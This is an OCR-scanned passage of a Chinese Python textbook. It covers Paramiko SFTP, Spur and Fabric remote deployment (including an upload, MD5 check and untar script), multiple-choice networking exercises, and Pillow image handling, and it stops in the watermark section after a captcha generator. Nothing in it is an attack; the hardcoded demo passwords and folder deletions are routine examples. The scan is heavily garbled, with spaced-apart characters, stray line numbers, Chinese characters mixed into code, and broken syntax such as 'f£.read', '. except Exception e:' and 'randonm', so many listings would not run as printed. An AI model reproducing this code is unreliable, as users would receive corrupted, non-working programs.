在 远程 主机 中 创建 文件 夹 ,方法 的 定义 为 


sftp. mkdir( remotepath) 
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如 sftp. mkdir(' /home/root/python',0755)。 


5) listdir() 方 法 

获取 远程 SFTP 服务 器 的 目录 列表 。 

6) rename() 方 法 

重 命 名 SFTP 服务 器 中 的 文件 夹 或 文件 。 
7) remove() 方 法 

删除 SFTP 服务 器 中 的 文件 夹 或 文件 。 
8) stat() 方 法 

获取 远程 SFTP 服务 器 指定 文件 的 信息 。 
例 [chl1 .7_1_sftp01. py】 


#coding:utf -8 
import paramiko 


host = "192.168.1.250" 


username = "username" 
password = "password" 
port = 22 

try: 


t = paramiko. Transport( (host, port)) 


t. connect (username = username, password= password) 


sftp = paramiko.SFTPClient. from transport(t) 


sftp. mkdir("/home/username/test/") 
sftp. rmdir("/home/username/test/") 


sftp. put("C:\\test. txt", "/home/username/test. txt") 
sftp. get("/home/username/test. txt", "C:\\test02. txt") 


t. close() 


. except Exception e: 


print(e) 


(人 说明: 第 9 行 ,Paramiko 模块 有 两 种 连接 方式 ,一 种 是 ch8-4-1-ssh. py 中 介绍 的 
paramiko. SSHClient() 函数 ; 另 一 种 是 通过 paramiko. Transport() 函数 。 这 里 使 用 第 二 种 


方法 。(host，port) 为 远程 主机 的 IP、 端 口 组 成 的 元 组 。 


第 10 行 , 连 接 SSH Server。 
第 12 行 ,使 用 sftp. mkdir() 函 数 在 远程 主机 上 创建 test 文件 夹 ,注意 该 文件 夹 在 


/home/username/ 下 ,username 随 远程 主机 用 户 名 的 不 同 而 不 同 。 
第 13 行 ,使 用 sftp. rmdir() 函 数 删除 test 文件 夹 。 


第 14 行 ,使 用 put() 函 数 将 Windows 本 地 C 盘 根 目录 下 的 test. txt 复制 到 远程 主机 。 
第 15 行 ,使 用 get() 函 数 将 远程 主机 上 的 test. txt 下 载 到 本 地 另存 为 C:Ntest02. txt。 


11.7.2 使 用 Spur 模块 


Spur 是 对 Paramiko 的 封装 ,并 提供 了 一 种 简单 的 API 进行 通用 SSH 操作 。 
CentOS 6 下 安装 方法 为 
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pip3 install spur 
Windows 下 安装 命令 为 


pip3 install spur 
1. 在 本 地 使 用 


>>> import spur 
>>> shell = spur.LocalShell() 


>>> result = shell.run(["echo", "—-n", "hello"]) 
>>> print( result. output) 
b'hello' 


这 种 使 用 方式 下 ,spur. LocalShell() 函数 不 需要 参数 。 
2. SshShell 方 式 使 用 
SshShell 方式 下 SshShell() 函数 需要 提供 hostname、username、password 或 者 私 钥 。 


>>> import spur 
>>> shell = spur.SshShell(hostname = "localhost", username = "testuser", password= "123456") 
>>> with shell: 

.. result = shell.run(["echo", "—n", "hello"]) 


>>> print(result. output) 


b'hello' 


使 用 私 钥 : 


spur. SshShell( 

hostname = "localhost", 

username = "bob", 

private key file= "path/to/private. key" 
) 


使 用 其 他 端口 : 


spur. SshShell( 
hostname = "localhost", 
port = 50022, 
username = "bob", 


password = "password1" 


11.7.3 使 用 Fabric 


1. Fabric 简介 

Fabric 是 另外 一 个 功能 比较 强大 的 SSH 库 和 命令 行 工具 ,可 以 用 于 应 用 软件 的 部 署 和 
系统 管理 任务 。 它 提供 了 一 套 基本 的 执行 本 地 或 远程 Shell 命令 上传/ 下 载 文 件 、 提 示 用 
户 输入 或 执行 失败 的 辅助 功能 。 其 官方 主页 为 https://www. fabfile. org/ ,Fabric 中 文 文 
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档 网 址 为 https://fabric-chs. readthedocs. io/zh_CN/chs/。 
因为 Fabric 是 Python(2. 5 一 2.7) 下 的 工具 ,后 来 移植 到 了 Python 3 ,两 者 之 间 存 在 兼 
容 性 问题 ,因此 ,Python 2 与 Python 3 下 安装 方法 不 同 ,Python 2 下 的 安装 方法 是 


> pip install fabric 
Python 3 下 的 安装 方法 是 
> pip install fabric3 


Fabric 默认 的 命令 行人 口 文件 名 为 fabfile. py, 在 该 文件 中 编写 代码 即 可 执行 。 下 面 来 
看 一 个 例子 ,创建 文件 fabfile. py: 


def hello(): 
print("hello fabric!") 


在 命令 行 下 执行 : 
C:\python34 > fab hello 


hello fabric! 


Done. 


可 以 定义 一 个 带 参数 的 函数 ,如 : 


def hello2(name = "world" ) : 
print("hello %s!"%name) 


在 命令 行 下 执行 : 
C:\python34 > fab hello2:name = lisi 


hello lisi! 


Done. 


或 者 用 下 面 的 命令 也 可 以 : 


C:\python34 > fab hello2:1isi 


2. Fabric 命令 行 参 数 
Fabric 命令 提供 了 丰富 的 命令 行 参数 ,可 以 通过 
>fab -- help 
查看 Fabric 命令 行 的 使 用 方法 ,下 面 简单 介绍 一 下 常见 的 命令 行 参数 : 
-显示 定义 好 的 任务 函数 名 ; 
二 指定 Fabric 入 口 文件 ,默认 的 入 口 文件 名 为 fabfile. py; 
-g 指定 网 关 ( 中 转 ) 设 备 ,如 跳板 机 等 ,此 处 填 跳 板 机 的 IP; 
-HH 指定 目标 主机 ,多 台 主 机 之 间 用 “, ”分 开 ; 


Oo 000 


232】 Python 编程 入 门 与 案例 详解 
2 -P 以 异步 并 行 方式 执行 多 主机 任务 ,默认 为 串 行 执行 ; 
2 -p 指定 认证 或 者 sudo 的 口令 ; 
9 -R 指 定 角色 (Role) ,以 角色 名 区 分 不 同业 务 组 设备 ; 
9 -u 指定 连接 远程 主机 的 用 户 名 ; 
9 -t 指 定 设备 连接 超时 时 间 (s); 
9 -指定 远程 主机 命令 执行 超时 时 间 (s); 
2 -w 当 任 务 执行 失败 ,发 出 告警 ,而 非 默 认 的 结束 任务 。 
比如 ,在 Fabric 命令 行 下 ,远程 执行 任务 ,命令 如 下 : 


C:\python34> fab - u zenggang - p 123456 -日 192.168.1.251 -- "uname —s" 


[192.168.1.251] Executing task '< remainder>" 
[192.168.1.251] run: uname —s 
[192.168.1.251] out: Linux 

[192.168.1.251] out: 


Done. 
Disconnecting from 192. 168.1.251... done. 


3. Fabric 环境 变量 的 设置 

执行 Fabric 命令 需要 有 很 多 的 环境 变量 ,可 以 通过 Evn 对 象 来 定义 Fabric 的 全 局 环境 
变量 ,可 以 设 定 的 全 局 变量 有 用 户 名 、 密 码 、 主 机 名 、 端 口角 色 等 ,定义 的 方法 及 含义 如 下 。 

9 env. host 指定 目标 主机 ,用 IP 或 主机 名 表示 均 可 ,在 Python 中 用 列表 表示 多 台 
机 ,如 env. host 二 ['192. 168. 1.100','192.168.1.200']; 
env. user 指定 用 户 名 ,如 env. user 二 'root'; 
env. port 指定 登录 远程 主机 时 使 用 的 端口 ,SSH 默认 使 用 22 端口 ; 
env. password 指定 登录 时 使 用 的 密码 ,如 env. password 一 '123456'; 
env. passwords 指定 登录 时 使 用 的 主机 、 端 口 、 用 户 名 ,口令 等 ,使 用 字典 的 形式 指 
定 , 如 env. passwords 一 {'userl@192. 168. 1. 100:22':'"123456',"user2@192. 168. 1. 
200:22':'135792468 '}; 
env. gateway 指定 网 关 ( 跳 板 机 ) 的 IP, 如 env. gateway 一 '192.168. 1. 100'; 

9 _env. roledefs 定义 角色 分 组 ,如 Web 组 和 db 组 等 : evn. roledefs 二 {'webservers': ['192. 

168. 1. 100', '192. 168. 1. 200'], 'dbservers':[ '192. 168. 150',"192. 168. 1. 250°] }。 

4. Fabric 常用 API 

Fabric 提供 了 大 量 的 API, 使 用 它们 可 以 完成 大 部 分 的 远程 运 维 和 系统 开发 部 署 的 任 
务 ,下面 简单 介绍 一 下 API。 

1) 带 颜色 的 输出 (color output) 

提供 彩色 输出 的 函数 ,如 在 支持 ANSI 的 终端 中 打印 彩色 文字 : 


oo 00%0o 


from fabric. colors import red, green, cyan, magenta 
print(red("This is red text;") + cyan("This is cyan text;")) 
print(magenta("This is magenta and bold"，bold= True)) 
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2) run (fabric. operations. run) 

Fabric 中 使 用 最 多 的 就 是 run() 方 法 了 。run() 方 法 是 用 来 在 一 台 或 者 多 台 远 程 主机 
上 面 执行 Shell 命令 。 

3) sudo (fabric. operations. sudo) 

使 用 sudo 命令 执行 root 的 命令 。 

4) local (fabric. operations. local) 

local 命令 是 执行 本 机 的 命令 或 者 脚本 ,使 用 方法 和 run() 方 法 及 sudo() 方 法 类 似 ,但 
是 有 一 个 区 别 : 捕获 结果 的 时 候 , 是 通过 指定 capture 一 False 或 者 capture 一 True 来 确定 。 

5) led(fabric. operations. lcd) 

切换 到 本 地 目录 。 如 lcd(\home)。 

6) get (fabric. operations. get) 

get() 方 法 是 从 远程 主机 copy 文件 到 本 地 ,功能 跟 scp 一 样 。 可 以 从 远程 主机 下 载 备 
份 ,或 者 日 志文 件 等 。 

7) put (fabric. operations. put) 

需要 上 传 和 分 发 文件 的 时 候 ,put 命令 就 派 上 了 用 场 ,使 用 方法 类 似 get() 方 法 。 也 同 
样 可 以 通过 . failed 或 . succeeded 判断 命令 是 否 执 行 成 功 。 

8) prompt(fabric. operations. prompt) 

获取 用 户 输入 信息 ,如 prompt("please input user name:")。 

9) 并 行 修饰 符 @parallel 

需要 并 行 执行 时 ,可 在 方法 上 面 使 用 修饰 符 @parallel, 为 了 防止 管控 机 器 上 过 多 地 并 
发 执行 任务 ,可 以 通过 @parallel(pool_size= 二 5) 来 设置 。 并 行 地 执行 输出 都 会 输出 到 一 个 
终端 上 面 ,比较 混乱 。 最 好 写 到 日 志文 件 中 ,以 任务 (Task) 为 维度 。 

10) 任务 修饰 符 @task 

@task 任务 修饰 符 用 于 标识 该 函数 是 Fabric 可 调用 的 , 非 标识 函数 对 Fabric 不 可 见 ， 
纯 业 务 逻 辑 。 

11) 执行 一 次 修饰 符 @run_once 

@run_once 修饰 的 函数 只 执行 一 次 ,不 受 多 台 主 机 影响 。 

5. 执行 本 地 与 远程 命令 

执行 本 地 命令 主要 有 local 和 lcd 命令 ,执行 远程 命令 用 run 命令 。 

例 [chl1 .7 _3_fabfile001. py】 


#coding:utf -8 
from fabric.api import * 


env. user = "Zenggang" 
env. hosts = ['192.168.1.251'] 
env. password = '3.1415926"' 
def localrun(): 
local('cd C:\\users') 
local('dir') 
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11. def remoterun( ) : 

12. cd( '\home') 

3 run('ls -al') 

执行 本 地 命令 : C:\Python34 二 fab -f ch11 .7_3_fabfile001. py localrun。 
执行 远程 命令 : C:\Python34>fab -f chl1_7_3_fabfile001. py remoterun。 


其 中 参数 -{ 指定 代码 文件 为 ch11 .7_3_fabfile001. py。 

6. 软件 的 发 布 

有 些 软件 的 开发 通常 在 Windows 下 完成 ,运行 通常 是 在 Linux 下 的 ,比如 ,Linux 下 运 
行使 用 Flask 框架 的 Web 应 用 程序 。 要 调试 发 布 软件 通常 是 非常 烦琐 的 ,可 以 使 用 Fabric 
对 软件 进行 归档 压缩 上 传 .MD5 校 验 .解压 发 布 。 

Windows 下 压缩 准备 发 布 的 软件 可 以 使 用 开源 的 7zip,7zip 可 以 在 命令 行 下 压缩 文件 
或 文件 夹 。7zip 默认 安装 在 C:\Program Files\7-Zip 文件 夹 下 ,将 位 于 7zip 安装 目录 下 的 
7z. exe 和 7z. dll 两 个 文件 复制 到 C:\windows\system32 目录 下 ,这样 在 任何 位 置 的 命令 行 
下 都 可 以 执行 7z. exe 程序 了 。 而 Linux 下 广泛 使 用 的 归档 压缩 格式 为 . tar, 所 以 通过 参数 
-ttar 指定 压缩 格式 为 . tar。 如 : 


7za -ttar blogapp.tar blogapp 


该 命令 将 blogapp 文件 夹 压缩 为 blogapp. tar 文件 。 

文件 下 载 /上 传 的 正确 性 通常 使 用 MD5 值 来 验证 ,在 Linux 下 有 md5sum 命令 来 计算 
MD5 值 ,但 Windows 下 没有 该 命令 ,可 以 从 https://www. pc-tools. net/win32/md5sums/ 
处 下 载 md5sums-1. 2. zip 文件 ,把 其 中 的 md4sums. exe 文件 也 复制 到 C:\ windows\ 
system32 目录 下 , 即 可 在 命令 行 下 计算 文件 的 MD5 值 了 。 当 然 也 可 以 使 用 Python 的 
hashlib 库 求 出 文件 的 MD5 值 ,下面 例 程 中 的 Imd5sum() 函 数 则 是 有 区 别 于 外 部 程序 的 另 
一 种 方法 。 

发 布 程序 的 最 后 一 步 则 是 解压 tar 文件 ,并 删除 tar 文件 。 

例 [chll1 7 3_fabfile002. py】 


from fabric.api import * 
import os. path 
import hashlib 
import tarfile 


env. hosts = [ '192.168.1.251'] 

env. user = "Zenggang" 

env. password = "3.1415926 

tar_file= 'C:\\python34\\blogapp. tar' 


11. def lmd5sum(filename) : 

12. f= open(filename, 'rb') 
I md5 = hashlib.md5() 

14. buf = f.read(128) 

5; while buf!= b"": 

16. md5. update( buf ) 
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buf = f£.read(128) 
f.close() 
return md5. hexdigest() 
# 使 用 Python 的 tarfile 对 准备 发 布 的 软件 进行 归档 压缩 
. def tar task(): 
make_targz("blogapp. tar", "blogapp") 
output filename = "blogapp. tar" 
source dir = "blogapp" 
with tarfile. open(output filename, "w:gz") as tar: 
tar. add( source dir, arcname = os.path. basename( source dir)) 
# 使 用 7zip 对 文件 进行 归档 压缩 
. def zip tar(): 
tarfile= 'C:\\python34\\blogapp. tar’ 
if os. path. exists(tarfile): 
os. remove( tarfile) 
with lcd("C:\\python34"): 
local("7z a - ttar blogapp. tar blogapp") 
# 实 现 上 传 功能 
, def put_ task(): 
if os. path. exists(tar file): 
with cd("\home\zenggang"): 
with settings(warn_only = True): 
result = put(tar file,"/home/zenggang/blogapp. tar") 
if result. failed and not confirm("put file failed, Continue[Y/N]?"): 
abort("Aborting file put task") 
else: 
print("The file blogapp. tar does not exists. ") 
# 对 上 传 前 和 上 传 后 的 tar 文件 进行 AD5 值 比较 
. def check task(): 
rmd5 = run("md5sum /home/zenggang/blogapp. tar"). split(' ')[0] 
# 使 用 Linux 的 md5sum 命令 获取 tar 文件 的 MD5 值 
井 lmd5 = lmd5sum("blogapp. tar") 
## 调 用 Python 函数 求 tar 文件 MD5 值 
lcd("C:\\Python34") 
lmd5 = local("md5sums — u blogapp. tar",capture= True). split(" ")[0] 
# 调用 md5sums. exe 程序 获取 MD5 值 , capture = True 设 定 捕获 结果 
if lmd5 == rmd5: 
print("MD5 校 验 通 过 ") 
else: 
print(" 数 据 MD5 出 错 ") 
. def untar task(): 
cd("/home/zenggang") 
run( "rm -rf blogapp') 井 先 删除 原 blogapp 文件 夹 , -~ 工 表示 递归 , -f 表 示 强 制 


run("tar 一 xvf blogapp.tar") 井 解 压 后 形成 新 的 blogapp 文件 夹 
run( "rm 一 上 blogapp.tar") 井 强制 删除 归档 blogapp. tar 文件 
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68. @task 

69. def go(): 

70. zip tar() 
bb put task() 
72， check_task() 
3; untar task() 


执行 程序 C:\Python34>fab -f fabfile002. py go, 完 成 软件 的 发 布 。 


习 题 
选择 题 
1. 下 面 不 是 常用 套 接 字 类 型 的 是 ( 要 
A. AF_UNIX B. AF_INET C. AF_INET6 D. AF_SOCKET 


2. TCP 是 一 种 (  ) 协 议 。 
A. 不 可 控制 流量 。 B. 不 可 控制 差错 C. 传输 速率 较 高 ”DD. 面向 连接 
3. UDP 是 一 种 (。“) 协 议 。 


A. 可 靠 B. 可 控制 差错 

C. 面向 连接 D. 传输 速率 较 高 
4. 使 用 TCP Socket 编程 时 ,首先 要 创建 一 个 ( ) 对 象 。 

A. socket B. connect C. bind D. listen 
5. 下 列 ( ”“”) 协 议 用 于 接收 电子 邮件 。 

A. POP3 B. SMTP CG. FTP D. SSH 
6. FTP 的 匿名 用 户 名 为 (  )。 

A. FTPUSER B: FTP C. NONE D. Anonymous 
7. Python 中 处 理 FTP 的 代码 库 为 ( )。 

A. poplib B. smtplib C. ftplib D. telnetlib 
8. 在 Linux 操作 系统 中 默认 是 没有 Telnet 的 ,而 是 使 用 更 安全 的 ( ) 协 议 。 

A FTP B. SSH C. DNS D. DHCP 
9. 下 列 资源 库 中 的 ( 。”) 模 块 ,不 可 以 登录 SSH 服务 器 。 

A. Paramiko B. Spur C. Fabric D. Ftplib 
10. SSH 不 仅 可 以 登录 服务 器 ,远程 执行 命令 ,还 可 以 (  ”)。 

A. 收发 邮件 B. 远程 传输 文件 ” C. 远程 通信 D. 时 间 同 步 


11. SSH 身份 认证 方法 不 包括 ( 这 
A. 公私 钥 认 证 B. 密 钥 认证 C. PAM 认证 D. 动态 口令 认证 


Python 中 进行 图 像 处 理会 用 到 PIL 模块 ,PIL 是 Python Imaging Library 的 缩写 , 它 是 
PythonWare 公司 提供 的 免费 的 图 像 处 理工 具 包 , 它 支持 多 种 格式 图 像 , 并 提供 强大 的 图 形 
与 图 像 处 理 能 力 。 

PIL 具备 (但 不 限于 ) 以 下 的 能 力 。 

9 数 十 种 图 像 格 式 的 读 / 写 能 力 。 常 见 的 JPEG、PNG、BMP GIF .TIFF 等 格式 ,都 在 
PIL 的 支持 之 列 。 另 外 ,PIL 也 支持 黑白 , 灰 阶 、 自 定义 调 色 盘 、RGB True Color 、 带 
有 透明 属性 的 RGB True Color.CMYK 及 其 他 数 种 的 影像 模式 ,相当 齐全 。 
基本 的 影像 资料 操作 : 裁 切 .平移 旋转 、 改 变 尺寸 . 转 置 , 剪 切 与 粘贴 等 。 
强化 图 形 : 亮度 、 色 调 、 对 比 、 锐 利 度 。 
色彩 处 理 。 

滤 镜 (Filter) 功 能 。PIL 提供 了 10 多 种 滤 镜 ,当然 ,这 个 数目 远 远 不 能 与 Photoshop 
或 GIMP 这 样 的 专业 特效 处 理 软体 相 比 ; 但 PIL 提供 的 这 些 滤 镜 可 以 用 在 Python 
程序 中 ,提供 批量 处 理 的 能 力 。 

9 PIL 可 以 在 图 像 中 绘制 点 、 线 、 面 .几何 形 状 、 填 满 ,文字 等 。 

因 PIL 目前 只 支持 到 Python 2.7, 暂 时 不 支持 Python 3. x, 这 里 介绍 它 的 一 个 兼容 分 
支 Pillow。Pillow 完全 兼容 PIL, 并 支持 Python 2. x 和 Python 3. x。Pillow 的 安装 方法 是 


oo 0 0090 


> pip install pillow 


PIL 提供 了 丰富 的 功能 模块 : Image、ImageDraw、ImageEnhance、ImageFile 等 。 最 常 
用 到 的 模块 是 Imnage、ImageDraw .ImageEnhance。 


12.1 Image 模块 


Image 模块 是 PIL 最 基本 的 模块 ,其 中 包含 最 重要 的 Image 类 ,一 个 Image 类 实例 对 应 
了 一 幅 图 像 。 同 时 ,Image 模块 还 提供 了 很 多 有 用 的 函数 。 
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1) 打开 图 片 文件 


>>> from PIL import Image 
井 Python 2 下 直接 输入 import Image 就 可 以 下 载 ,而 Python 3 下 须 用 上 述 方式 引入 


>>> img = Image.open('C:\\ flower. jpg') # 打 开 图 片 文件 
>>> img. show() 井 显示 图 片 
>>> print( img. mode, img. size, img. format) # 打 印 图 片 信息 


RGB (692, 614) JPEG 
>>> img. save( 'D:\\img01. png', 'png') 并 另存 为 另 一 文件 
2) 创建 一 个 新 文件 


>>> newImg = Image.new("RGBA", (640,480), (128,128,128,0)) 
>>> newJmg. save("D:\\newImg. png", "PNG") 


>>> newInmg. show( ) 


(村 说 明 : RGBA 为 图 片 的 mode; (640,480) 为 图 片 尺寸 ; (128,128,128) 为 图 片 大 
色 , 颜 色 第 四 位 为 Alpha 值 , 可 填 可 不 填 。 
3) 改变 图 片 尺寸 


>>> smallimg = img. resize( (128, 128), Image. ANTIALIAS) 
>>> smallimg. save( 'D:\\smallimg. jpg') 


(本 说 明 : (128,128) 为 更 改 后 的 尺寸 ,Image. ANTIALIAS 有 消除 锯齿 的 效果 。 
4) 转换 图 片 的 模式 


>>> img = Image.open("C:\\flower. jpg ") 
>>> img = img. convert("RGBR" ) 


人 全 说 明 : 将 img 图 片 的 mode 转换 为 "RGBA" 模 式 。 
5) 分 割 图 片 通道 


>>> img = Image.open('D:\\flower. jpg') 
>>> if img. mode != "RGBA": 

img. convert( "RGBA") 
>>> rimg, gimg, bimg,aimg = img. split() 
>>> rimg. show( ) 
>>> gimg. show( ) 
>>> bimg. show( ) 


人 二 说明: 将 img 代表 的 图 片 分 割 成 RG.、B、A 通道 。 

如 果 是 RGBA ,分 割 后 就 有 4 个 通道 。rimg、gimg、bimg、aimg 分 别 代 表 了 R(Red)、 
G(Green) 、.B(Blue)、A(Alpha)4 个 通道 。 

6) merge 合并 通道 


>>> mergedimg = Image.merge("RGBA", (rimg,gimg,bimg,aimg)) 
>>> mergedimg. save( "D:\\mergedimg. png", "png") 
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村 说 明 : 使 用 Image. merge("RGBA",(rimg,gimg,bimg,aimg)) 将 通道 合成 为 一 张 
图 片 ," RGBA" 模 式 的 图 片 通道 分 为 R(Red)、G(Green)、B(Blue)、A(Alpha)。 rimg、gimg、 
bimg .aimg 分 别 为 自 定 义 的 R.G、B、A。 

7) 粘贴 图 片 


>>> imgl = Image.open("C:\\flower. jpg ") 
>>> img2 = Image.open("D:\\1ogo. jpg") 
>>> imgl. paste( img2, (20, 20)) 

>>> imgl. show() 

>>> imgl. save("D:\\pastedimg. png") 


人 全 说明: imgl. paster(img2,(20,20)) 是 将 图 片 img2 粘贴 到 图 片 imgl 上 。(20,20) 


是 粘贴 的 坐标 位 置 。 
8) 复制 图 片 
>>> img3 = Image.open("C:\\flower. jpg ") 
>>> bounds = (50,50,100,100) 
>>> cutimg = img3.crop(bounds) 


>>> cutimg. save("D:\\cutimg. png") 


人 村 说 明 : bounds 为 自 定义 的 复制 区 域 (xl,yl,x2,y2),xl 和 yl 决定 了 复制 区 域 左 


上 和 角 的 位 置 ,x2 和 y2 决定 了 复制 区 域 右 下 角 的 位 置 。 
9) 旋转 图 片 
>>> img4 = Image.open("D:\\cutimg. png") 


>>> rotateimg = img4. rotate(45) 
>>> rotateimg. show( ) 


(可 说 明 : img4. rotate(45) 将 img4 逆 时 针 旋 转 45°。 
10) 获取 像素 

>>> img = Image.open("C:\\flower. jpg ") 

>>> position = (100,100) 

>>> apixel = img.getpixel(position) 

>>> apixel 

(237, 244, 202) 


人 说明: getpixel 〇 函数 返回 指定 位 置 的 像素 ,如 果 图 像 是 多 层 的 , 则 返回 一 个 元 组 。 


该 方法 较 慢 , 若 处 理 大 图 片 请 使 用 load() 函 数 与 getdata() 函 数 。 
11) 设置 像素 


>>> position (100,100) 

>>> rgbcolor = (123,234,215) 

>>> img. putpixel(position,rgbcolor) 
>>> apixel2 = img.getpixel(position) 
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>>> apixel2 


(123, 234; .215) 


12. 2 ”ImageDraw 模块 


ImageDraw 模块 提供 了 基本 的 图 形 绘 制 能 力 。 通 过 ImageDraw 模块 提供 的 图 形 绘制 
函数 ,可 以 绘制 直线 . 弧 线 .矩形 、. 多边形、 椭圆 、 扇形 等 。ImageDraw 实现 了 一 个 Draw 类 ， 
所 有 的 图 形 绘制 功能 都 是 在 Draw 类 实例 的 方法 中 实现 的 。 下 面 的 代码 实现 了 线段 与 圆 弧 
的 绘制 。 


>>> from PIL import ImageDraw, Image 

>>> img = Image.open("D:\\flower. jpg") 

>>> width, hight = img. size 

>>> draw = ImageDraw.Draw( img) 

>>> draw. line( ((0,0), (width— 1,hight ~ 1)),fill= (255,0,0)) 
>>> draw. line( ((0, hight — 1), (width— 1,0)),fill= (255,0,0)) 
>>> draw. arc( (0,0,width— 1,hight- 1),0,360, fill = (255,0,0)) 
>>> img. show() 

>>> img. save( 'D:\\flower02. png') 


(村 说 明 : 绘制 图 像 之 前 ,首先 通过 ImageDraw. Draw() 函数 实例 化 Draw 类 ,然后 所 
有 的 图 形 绘制 功能 都 是 由 Draw 类 实例 中 的 方法 实现 的 。 画 线 函 数 ImageDraw. line() 需 要 
传递 两 个 参数 ,第 一 个 参数 为 线段 的 起 点 与 终点 ; 第 二 个 参数 为 颜色 值 。 绘 制 圆 弧 函数 
ImageDraw. arc() 需 传递 四 个 参数 ,分 别 为 圆 弧 的 左上 角 与 右 下 角 坐 标 , 启 始 角度 ,结束 角 
度 , 颜 色 值 。 


12.3 ImageFont 模块 


ImageFont 模块 定义 了 ImageFont 类 ,该 类 的 实例 中 存储 了 bitmap 字体 , 通过 
ImageDraw 类 的 text() 方 法 绘制 文本 内 容 。 


>>> image = Image.open("D:\\flower02. png") 

>>> draw = ImageDraw.Draw( image) 

>>> yhfont = ImageFont.truetype("MSYH.TTC"，36) 

# 打开 微软 的 雅 黑 字 体 ,该 字体 一 定 要 预 安装 在 系统 上 , 若 没有 换 一 种 字体 即 可 
>>> draw. text((20,20)," 美 丽 的 花 ",font = yhfont, fill = (255,0,0)) 

井 于 (20,20) 位 置 ,使 用 刚才 定义 的 字体 ,红色 填充 ,绘制 "美丽 的 花 " 四 个 字 

>>> image. show() 

>>> image. save( 'D:\\flower text. jpg') 


绘制 的 图 片 效 果 如 图 12-1 所 示 。 
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图 12-1 


区 了 


绘制 的 图 片 效 果 





12.4 ”ImageFilter 模块 


ImageFilter 是 PIL 的 滤 镜 模块 ,当前 版 本 支持 10 种 加 强 滤 镜 ,通过 这 些 预定 义 的 滤 
镜 , 可 以 方便 地 对 图 片 进行 一 些 过 滤 操 作 , 从 而 去 掉 图 片 中 的 噪点 (部 分 消除 ), 这 样 可 以 降 
低 将 来 处 理 的 复杂 度 (如 模式 识别 等 )。 表 12-1 所 示 为 PIL 滤 镜 类 型 。 





























表 12-1 PIL 滤 镜 类 型 
滤 镜 名 称 含义 
ImageFilter. BLUR 模糊 滤 镜 
ImageFilter. CONTOUR 轮廓 滤 镜 
JImageFilter. EDGE_ENHANCE 边界 加 强 
ImageFilter. EDGE_ENHANCE_MORE 边界 加 强 ( 阅 值 更 大 ) 
ImageFilter. EMBOSS 浮雕 滤 镜 
ImageFilter. FIND_EDGES 边界 滤 镜 
ImageFilter. SMOOTH 平滑 滤 镜 
ImageFilter. SMOOTH_MORE 平滑 滤 镜 ( 阔 值 更 大 ) 
ImageFilter. SHARPEN 锐 化 滤 镜 


>>> from PIL import Image, ImageFilter 





>>> image = Image. open("D:\\flower text. jpg") 
>>> imgfilted2 = image.filter(ImageFilter. CONTOUR) # 使 用 轮廓 滤 镜 
>>> imgfilted2. show() 


使 用 轮廓 滤 镜 后 的 图 片 效 果 如 图 12-2 所 示 。 
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图 12-2 使 用 轮廓 滤 镜 后 的 图 片 效 果 


12.5 PIL 在 安全 领域 的 应 用 


PIL 除了 通常 的 图 像 处 理 外 ,在 安全 领域 也 是 有 应 用 的 。 下 面 就 以 生成 验证 码 图 片 .给 
图 片 添加 水 印 .生成 二 维 码 为 例 , 介 绍 PIL 的 应 用 。 


12.5.1 生成 验证 码 图 片 


随 着 互联 网 应 用 及 搜索 引擎 的 不 断 发 展 ,在 网 页 中 ,为 了 防止 息 虫 自动 提交 表单 ,确保 
在 客户 端 是 一 个 人 在 操作 ,现在 很 多 网 页 中 使 用 验证 码 图 片 增加 表单 提交 的 难度 ,防止 搜索 
引擎 抓 取 特定 网 页 。 
验证 码 图 片 生成 的 原理 是 这 样 的 : 随机 地 生成 若干 个 字符 ,并 绘制 到 图 片 中 ,然后 对 图 
片 的 背景 或 前 景 进行 识别 难度 的 处 理 ,处 理 措施 包括 : 随机 绘制 不 同 颜 色 的 背景 点 ; 
@ 使 用 随机 色 绘 制 字符 ; @ 在 图 片 中 绘制 随机 的 线段 ; 田 对 图 片 进行 变形 、 模 糊 等 处 理 。 
近 段 时 间 , 也 有 显示 花 、 球 等 实物 图 片 让 操作 者 识别 ,以 增加 提交 的 难度 。 下 面 以 部 分 代码 
解释 验证 码 图 片 的 生成 原理 。 
例 [ch1l2_5_lgencode. py】 
莫 一 四 .= Codingsitf-8 一 办 :一 
from PIL import Image, ImageDraw, ImageFont, ImageFilter 
import random 


a 

2 

3 

4. 

5. 井 产 生 随 机 字母 
6. def rndChar() : 

“ str = 'abcdefghjkmnpqrstuwxyABCDEFGHJKMNPRSTUWXY23456789(@# $ %&' 
8 # 去 除 易 混淆 的 i,1,v,o,z,0,1,2 

9 return str[random. randint(0, len(str)—1)] 

11. # 生 成 随机 颜色 

12. def rndColor(): 


58. 





return (random. randint(64, 255), random. randint(64, 255), random. randint(64, 255)) 


300 x 60: 


. width = 50 * 6 
. height = 60 
. image = Image.new('RGB', (width, height), (255, 255, 255)) 


# 创建 Font 对 象 


. font = ImageFont.truetype('ALGER.TTF'，48) 


# 注 意 : 运行 程序 时 ,此 处 可 能 会 出 错 。 出 错 的 原因 是 在 系统 中 没有 该 字体 文件 
Windows 平台 下 ,字体 名 一 定 要 是 C:\windows\fonts\ 下 已 经 安装 的 字体 文件 名 
BRUSHSCI. TTF 手写 体 

ALGER. TTE 





# 创 建 Draw 对 象 


. draw = ImageDraw. Draw( image) 


. def create lines(n line): 


"绘制 干扰 线 "" 
for i in range(n line): 
# 起 始点 
begin = (randonm. randint(0, size[0]), random. randint(0, size[1])) 
# 结束 点 
end = (random. randint(0, size[0]), random. randint(0, size[1])) 
draw. line( [begin, end], fill = rndColor()) 


. def create points(point chance): 


… 绘 制 干扰 上 
chance = min(100，max(0，point_chance)) # 大 小 限制 在 [0, 100] 
for w in range(width) : 





for h in range(height) : 
tmp = random.randint(0，100) 
if tmp > 100 — chance: 
draw. point((w, h)，fill= rndColor()) 


. def draw_str() : 


"给 制 文字 '" 

drawed str="" 

for t in range(6) : 
draw_chr = rndChar() 
draw. text((50 * t + 10, 5), draw chr, font = font, fill= rndColor()) 
drawed str= drawed str+ draw_ chr 

print(drawed_str) 


. Create lines(6) # 绘 制 干扰 线 
. Create points(15) # 绘 制 干扰 点 
. draw_str() # 绘 制 字 符 


image. save( 'code. jpg', 'jpeg'); 


生成 的 验证 码 图 片 效果 如 图 12-3 所 示 。 
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图 12-3 生成 的 验证 码 图 片 效果 


12.5.2 给 图 片 添加 水 印 


所 谓 数字 水 印 是 向 多 媒体 数据 (如 图 像 声音、 视频 信号 等 ) 中 添加 某 些 数字 信息 以 达到 
文件 真 伪 鉴 别 . 版 权 保护 等 功能 。 典 入 的 水 印信 息 隐藏 于 宿主 文件 中 ,不 影响 原始 文件 的 可 
